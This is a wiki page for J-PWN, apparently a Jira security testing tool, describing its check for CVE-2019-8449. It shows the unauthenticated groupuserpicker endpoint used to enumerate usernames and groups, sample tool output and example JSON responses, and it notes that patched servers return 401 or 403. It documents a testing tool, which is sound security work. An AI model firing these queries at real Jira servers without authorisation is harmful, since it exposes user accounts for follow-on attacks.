CVE‐2019‐8449 - carnal0wnage/J-PWN GitHub Wiki
CVE-2019-8449
Category: [Username Enumeration]
[CG] you can brute force usernames or guess/validate group names at this endpoint
module name: check_cve_2019_8449
url: /rest/api/latest/groupuserpicker?query=<usernametoguess>&maxResults=50000&showAvatar=true
+ [Username Enumeration] CVE-2019-8449 Detected
URL: https://jira/jira/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
URL: https://jira/jira/rest/api/latest/groupuserpicker?query=<usernametoguess>&maxResults=50000&showAvatar=true
Total Users Found: 0
User Header: Showing 0 of 0 matching users
User Details: No users listed.
Total Groups Found: 0
Group Header: Showing 0 of 0 matching groups
Group Details: No groups listed.
ex: 1 - Query for the group jira-users
https://jiraserver/jira/rest/api/latest/groupuserpicker?query=jira-users&maxResults=50000&showAvatar=true
{
"users": {
"users": [],
"total": 0,
"header": "Showing 0 of 0 matching users"
},
"groups": {
"header": "Showing 1 of 1 matching groups",
"total": 1,
"groups": [
{
"name": "jira-users",
"html": "\u003Cb\u003Ejira-users\u003C/b\u003E",
"labels": []
}
]
}
}
ex: 2 - Query for a specific user tkha
https://jiraserver/jira/rest/api/latest/groupuserpicker?query=tkha
{
"users": {
"users": [
{
"name": "tkha",
"key": "tkha",
"html": "Thong Kha (\u003Cstrong\u003Etkha\u003C/strong\u003E)",
"displayName": "Thong Kha"
}
],
"total": 1,
"header": "Showing 1 of 1 matching users"
},
"groups": {
"header": "Showing 0 of 0 matching groups",
"total": 0,
"groups": []
}
}
Patched versions will give you a 401 or 403
You are not authenticated. Authentication required to perform this operation.
--
Description The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
References